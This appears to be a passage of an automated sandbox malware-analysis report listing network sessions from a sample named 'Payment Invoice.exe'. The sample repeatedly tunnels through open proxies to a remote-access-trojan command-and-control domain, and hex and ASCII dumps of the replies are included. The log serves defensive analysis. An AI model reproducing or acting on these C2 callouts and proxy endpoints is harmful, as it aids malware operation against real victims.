                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                642192.168.2.452142218.145.131.1824437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.983846903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                643192.168.2.452144218.145.131.1824437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.985758066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                644192.168.2.452067104.27.8.161807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.987641096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.142118931 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:17 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                645192.168.2.452149218.145.131.1824437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.988938093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                646192.168.2.452153218.145.131.1824437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.989978075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                647192.168.2.45125447.242.234.237807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.992291927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                648192.168.2.45197772.210.252.13741457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.993904114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                649192.168.2.451962217.23.11.194327087076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.031438112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.594958067 CET226INHTTP/1.1 403 Forbidden
                                                                Date: Mon, 11 Mar 2024 15:15:17 GMT
                                                                Content-Length: 101
                                                                Content-Type: text/plain; charset=utf-8
                                                                Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a
                                                                Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                650192.168.2.452096172.67.182.22807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.032108068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.186414957 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:17 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                651192.168.2.451947212.118.43.143807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.032665014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.345733881 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                652192.168.2.451553120.234.203.17190027076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.032843113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.323653936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.511740923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.211560011 CET311INHTTP/1.1 400 Bad Request
                                                                Server: nginx
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 166
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>
                                                                Mar 11, 2024 16:15:23.152441025 CET311INHTTP/1.1 400 Bad Request
                                                                Server: nginx
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 166
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                653192.168.2.45197093.190.142.57418907076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.032855988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.327414989 CET226INHTTP/1.1 403 Forbidden
                                                                Date: Mon, 11 Mar 2024 15:15:17 GMT
                                                                Content-Length: 101
                                                                Content-Type: text/plain; charset=utf-8
                                                                Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a
                                                                Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                654192.168.2.451863103.199.18.248807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.033019066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.397876978 CET176INHTTP/1.1 404 Not Found
                                                                Content-Type: text/plain; charset=utf-8
                                                                X-Content-Type-Options: nosniff
                                                                Date: Mon, 11 Mar 2024 15:15:17 GMT
                                                                Content-Length: 19
                                                                Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                Data Ascii: 404 page not found


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                655192.168.2.451723203.76.103.11741457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.033665895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                656192.168.2.45189714.103.24.14880007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.033667088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                657192.168.2.45202367.43.228.25356337076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.033920050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.268928051 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                658192.168.2.451895185.217.143.23807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.033921957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.372154951 CET327INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Mon, 11 Mar 2024 15:15:17 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 166
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                659192.168.2.451204222.138.76.690027076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.034003973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                660192.168.2.45195118.228.198.164807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.034580946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.357995033 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:17 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0
                                                                Mar 11, 2024 16:15:17.388753891 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ef 20 04 24 87 2b d0 e4 59 78 3d e7 9a 5a aa ee 45 c9 fc f3 93 f6 c0 50 37 ed 11 b4 8c 5d a9 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                Data Ascii: e $+Yx=ZEP7]*,+0/$#('=<5/Uartemis-rat.com#
                                                                Mar 11, 2024 16:15:17.713855028 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 1f 51 f9 0d c7 56 be 26 57 c4 5f dd b2 e3 7f 53 18 d6 6a 70 6e fc 27 c4 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                Data Ascii: =9QV&W_Sjpn'DOWNGRD0000*H010Uartemis-rat.com0240311145335Z260311145335Z010Uartemis-rat.com0"0*H0t71MAQ
                                                                Mar 11, 2024 16:15:17.718122005 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 c0 18 34 1a 1d e1 f7 54 bf aa 9b 0a 0b 8e c8 28 21 11 f3 c3 cf 27 19 a6 e6 ff e0 2f 24 2c f5 67 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 ef 92 12 15 8d f8 74 fd 40 f9 53 98 9d 2a 56 c0 67 02 2c 2a 90
                                                                Data Ascii: %! 4T(!'/$,g(t@S*Vg,*:jntoS
                                                                Mar 11, 2024 16:15:18.041999102 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 f6 de 85 a0 82 58 04 39 8d d9 b1 c1 c8 34 74 60 e7 11 aa 4b 71 9c a2 47 c5 15 1a 81 eb 7a f8 93 5b c8 00 41 c0 1c 7a 75
                                                                Data Ascii: (X94t`KqGz[Azu


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                661192.168.2.45191638.54.16.97807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.037852049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.537753105 CET176INHTTP/1.1 404 Not Found
                                                                Content-Type: text/plain; charset=utf-8
                                                                X-Content-Type-Options: nosniff
                                                                Date: Mon, 11 Mar 2024 15:15:17 GMT
                                                                Content-Length: 19
                                                                Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                Data Ascii: 404 page not found


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                662192.168.2.451987185.103.101.39100517076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.044583082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:57.794672966 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                663192.168.2.45199043.129.228.4678917076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.048593044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                664192.168.2.452064142.54.236.9741457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.053385973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
